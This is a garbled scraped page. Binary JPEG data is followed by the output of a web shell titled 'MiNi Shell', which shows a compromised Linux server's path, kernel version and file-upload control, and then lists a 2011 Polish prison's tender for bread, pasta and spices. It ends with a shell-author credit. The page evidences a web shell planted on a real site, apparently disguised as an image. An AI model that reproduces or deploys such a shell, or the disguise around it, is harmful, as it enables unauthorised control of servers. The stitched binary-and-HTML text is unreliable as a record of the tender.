JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110506/130795-N-2011.html

<p class="kh_header"><b>Rawicz: Sukcesywne dostawy pieczywa, margaryny oraz przypraw i innych produktów spożywczych.</b><br>
<b>Numer ogłoszenia: 130795 - 2011; data zamieszczenia: 06.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Rawiczu , ul. 17 Stycznia 28, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5468500, 5468551,53,56, faks 065 5454266.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy pieczywa, margaryny oraz przypraw i innych produktów spożywczych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
sukcesywne dostawy pieczywa, makaronu oraz przypraw i innych produktów spożywczych.

Zamawiający podzielił przedmiot zamówienia na trzy części (zadania):
-zadanie nr 1- Sukcesywne dostawy pieczywa,
-zadanie nr 2- Sukcesywne dostawy makaronu,
-zadanie nr 3- Sukcesywne dostawy przypraw i innych produktów spożywczych,

Wykonawca może złożyć ofertę na dowolną ilość zadań.

Zadanie nr 1: Sukcesywne dostawy pieczywa. 

Chleb żytni baltonowski -  świeży, krojony, foliowany, waga 0,36 kg lub 0,40 kg (po wcześniejszym 7 dniowym powiadomieniu), etykietowany, termin przydatności min. 4 dni
Chleb pszenny -  świeży, krojony, foliowany, waga - 0,36 kg lub 0,40 kg (po wcześniejszym 7 dniowym powiadomieniu), etykietowany, termin przydatności min. 4 dni
Bułka tarta - opakowania 1-50 kg
Bułka pszenna -  świeża,  waga - 100 g 
Pączek - świeży, z nadzieniem, waga - 60g
Placek drożdżowy -  świeży, z kruszonką
Chleb graham - świeży, krojony, foliowany, waga 0,36 kg lub 0,40 kg (po wcześniejszym 7 dniowym powiadomieniu), etykietowany, termin przydatności min. 4 dni

Szacunkowe ilości przedmiotu zamówienia:

Zadanie nr  1 - Sukcesywne dostawy pieczywa:

Chleb baltonowski żytni	120 000  kg
Chleb pszenny 26 000  kg
Bułka pszenna   37 000 szt
Bułka tarta   1 200  kg
Pączki    2 000  szt.
Placek drożdżowy  150  kg
Chleb graham  300  kg

Zadanie nr 2: Sukcesywne dostawy makaronu. 

Makaron - forma kolanka, świderki, opakowania 1-30 kg

Szacunkowe ilości przedmiotu zamówienia:

Zadanie nr  2 - Sukcesywne dostawy makaronu:

Makaron - kolanka lub świderki 15 000  kg


Zadanie nr 3: Sukcesywne dostawy przypraw i innych produktów spożywczych. 

Czekolada -  tabliczka - 100g
Ketchup - opakowania  1 - 5 kg
Przyprawa warzywna do potraw, typu Vegetalub równoważna, opakowania 1- 5kg
Przyprawa do zup -  opakowanie 1 litr
Pieprz czarny mielony-  opakowania do 1 kg
Liść laurowy - opakowania do 1 kg
Majeranek - opakowania do 1 kg
Sól -  opakowania 1 kg
Ocet - opakowanie 0,5 - 1 litr
Musztarda - opakowania 0,9 - 5 kg
Papryka mielona ostra -   opakowanie do 1 kg
Ziele angielskie -  opakowanie do 1 kg
Sos grzybowy - opakowania 1 - 10 kg
Sos pieczeniowy - opakowania 1 - 10 kg
Sos biały - opakowania 1 - 10 kg
Sos cygański - opakowania 1 - 10 kg
Barszcz biały - opakowania 1 - 10 kg
Zupa grzybowa -  opakowania 1 - 10 kg
Oregano - opakowania do 1 kg
Curry -  opakowania do 1 kg
Żurek - opakowania 1 - 10 kg
Zupa błyskawiczna -  różne smaki, opakowania jednostkowe do 100g (opakowanie w gramaturze do dwóch miejsc po przecinku) umożliwiające przygotowanie posiłku dla 1 osoby, 
Cukier -  opakowania 1 - 50 kg
Bulion drobiowy - opakowania 1 - 25 kg  
Herbata - opakowania 1 - 30 kg
Kawa zbożowa -  opakowania 1 - 30 kg
Kwasek cytrynowy -  opakowania do 1 kg
Miód sztuczny - opakowania: słoik lub wiaderko plastikowe 0,4 - 15 kg

Szacunkowe ilości przedmiotu zamówienia:

Zadanie nr  3 - Sukcesywne dostawy przypraw i innych produktów spożywczych:

Czekolada	         70  kg
Ketchup	    1 000  kg 
Przyprawa warzywna do potraw   1 400  kg 
Przyprawa do zup	    1 400   l 
Pieprz      70  kg 
Liść laurowy        10  kg 
Majeranek        85  kg 
Sól     2 500  kg 
Ocet    550  l 
Musztarda  1 400  kg 
Papryka      30  kg 
Ziele angielskie    14   kg 
Sos grzybowy   260  kg 
Sos pieczeniowy        500  kg 
Sos biały     700  kg 
Sos cygański    450   kg 
Barszcz biały   350   kg 
Zupa grzybowa   500   kg 
Oregano      4    kg 
Curry      10   kg 
Żurek    400   kg 
Zupa błyskawiczna	35   kg 
Cukier    16 000   kg 
Bulion drobiowy   1 900   kg 
Herbata granulowana  700  kg 
Kawa zbożowa 1 200  kg 
Kwasek cytrynowy	  27  kg 
Miód sztuczny  2 200  kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.88.11.00-6, 15.81.11.00-7, 15.81.14.00-0, 15.85.11.00-9, 15.83.10.00-2, 15.84.21.00-3, 15.86.30.00-5, 15.87.10.00-4, 15.87.24.00-5, 15.89.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia przez Wykonawców wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku o oświadczenie, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku o oświadczenie, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku o oświadczenie, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku o oświadczenie, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku o oświadczenie, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Rawiczu, ul. 17-go Stycznia 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2011 godzina 09:00, miejsce: Zakład Karny w Rawiczu, ul. 17-go Stycznia 28, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywne dostawy pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1: Sukcesywne dostawy pieczywa. 

Chleb żytni baltonowski -  świeży, krojony, foliowany, waga 0,36 kg lub 0,40 kg (po wcześniejszym 7 dniowym powiadomieniu), etykietowany, termin przydatności min. 4 dni
Chleb pszenny - świeży, krojony, foliowany, waga - 0,36 kg lub 0,40 kg (po wcześniejszym 7 dniowym powiadomieniu), etykietowany, termin przydatności min. 4 dni
Bułka tarta -  opakowania 1-50 kg
Bułka pszenna -  świeża,  waga - 100 g 
Pączek -  świeży, z nadzieniem, waga - 60g
Placek drożdżowy -  świeży, z kruszonką
Chleb graham -  świeży, krojony, foliowany, waga 0,36 kg lub 0,40 kg (po wcześniejszym 7 dniowym powiadomieniu), etykietowany, termin przydatności min. 4 dni

Szacunkowe ilości przedmiotu zamówienia:

Zadanie nr  1 - Sukcesywne dostawy pieczywa:

Chleb baltonowski żytni	120 000  kg
Chleb pszenny  26 000  kg
Bułka pszenna  37 000 szt
Bułka tarta    1 200  kg
Pączki  2 000  szt.
Placek drożdżowy 150  kg
Chleb graham 300  kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.88.11.00-6, 15.81.11.00-7, 15.81.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywne dostawy makaronu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2: Sukcesywne dostawy makaronu. 

Makaron - forma kolanka, świderki, opakowania 1-30 kg

Szacunkowe ilości przedmiotu zamówienia:

Zadanie nr  2 - Sukcesywne dostawy makaronu:

Makaron - kolanka lub świderki 15 000  kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.85.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy przypraw i innych produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3: Sukcesywne dostawy przypraw i innych produktów spożywczych. 

Czekolada -   tabliczka - 100g
Ketchup -  opakowania  1 - 5 kg
Przyprawa warzywna do potraw, typu Vegeta lub równoważna, opakowania 1 - 5 kg
Przyprawa do zup -  opakowanie 1 litr
Pieprz czarny mielony- opakowania do 1 kg
Liść laurowy -  opakowania do 1 kg
Majeranek - opakowania do 1 kg
Sól -  opakowania 1 kg
Ocet -  opakowanie 0,5 - 1 litr
Musztarda -  opakowania 0,9 - 5 kg
Papryka mielona ostra -   opakowanie do 1 kg
Ziele angielskie -  opakowanie do 1 kg
Sos grzybowy -  opakowania 1 - 10 kg
Sos pieczeniowy - opakowania 1 - 10 kg
Sos biały - opakowania 1 - 10 kg
Sos cygański - opakowania 1 - 10 kg
Barszcz biały - opakowania 1 - 10 kg
Zupa grzybowa - opakowania 1 - 10 kg
Oregano -  opakowania do 1 kg
Curry - opakowania do 1 kg
Żurek -  opakowania 1 - 10 kg
Zupa błyskawiczna -  różne smaki, opakowania jednostkowe do 100g (opakowanie w gramaturze do dwóch miejsc po przecinku) umożliwiające przygotowanie posiłku dla 1 osoby, 
Cukier -  opakowania 1 - 50 kg
Bulion drobiowy - opakowania 1 - 25 kg  
Herbata - opakowania 1 - 30 kg
Kawa zbożowa - opakowania 1 - 30 kg
Kwasek cytrynowy - opakowania do 1 kg
Miód sztuczny - opakowania: słoik lub wiaderko plastikowe 0,4 - 15 kg

Szacunkowe ilości przedmiotu zamówienia:

Zadanie nr  3 - Sukcesywne dostawy przypraw i innych produktów spożywczych:

Czekolada         70  kg
Ketchup    1 000  kg 
Przyprawa warzywna do potraw  1 400  kg 
Przyprawa do zup	    1 400   l 
Pieprz      70  kg 
Liść laurowy     10  kg 
Majeranek         85  kg 
Sól     2 500  kg 
Ocet      550  l 
Musztarda  1 400  kg 
Papryka       30  kg 
Ziele angielskie     14   kg 
Sos grzybowy   260  kg 
Sos pieczeniowy        500  kg 
Sos biały     700  kg 
Sos cygański    450   kg 
Barszcz biały    350   kg 
Zupa grzybowa    500   kg 
Oregano        4    kg 
Curry       10   kg 
Żurek   400   kg 
Zupa błyskawiczna  	35   kg 
Cukier	    16 000   kg 
Bulion drobiowy   1 900   kg 
Herbata granulowana   700  kg 
Kawa zbożowa  1 200  kg 
Kwasek cytrynowy  27  kg 
Miód sztuczny    2 200  kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.84.21.00-3, 15.86.30.00-5, 15.87.10.00-4, 15.87.24.00-5, 15.89.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com